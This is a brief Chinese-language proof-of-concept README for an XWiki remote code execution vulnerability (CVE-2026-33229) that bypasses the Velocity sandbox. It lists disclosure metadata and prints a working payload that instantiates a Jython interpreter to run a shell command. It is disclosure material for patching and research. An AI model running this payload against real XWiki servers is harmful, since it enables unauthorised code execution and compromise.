
# CVE-2026-33229 的概念验证漏洞利用程序 针对 XWiki 远程代码执行(RCE)漏洞的概念验证利用程序,该漏洞通过 Apache Velocity 沙箱绕过实现,包含技术细节及可用的攻击载荷。
XWiki Platform 中的一个远程代码执行漏洞,允许具有脚本权限的已认证用户完全绕过 Apache Velocity 沙箱——无需 Java 反射——通过遍历 Velocity 上下文中已预先实例化的对象实现。
📄 完整技术细节: youssefazefzaf.com/posts/cve
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2026-33229 |
| 受影响产品 | XWiki Platform |
| 组件 | Velocity 宏渲染器,页面标题参数 |
| 所需权限 | 已认证 + 脚本权限 |
| 影响 | 远程代码执行 |
| GHSA | GHSA-h259-74h5-4rh9 |
| 发现日期 | 2025年11月7日 |
| 修复日期 | 2025年12月10日 |
| 披露日期 | 2026年4月8日 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
负责任披露声明: PoC 在补丁可用后发布。 请勿将其用于您不拥有的系统。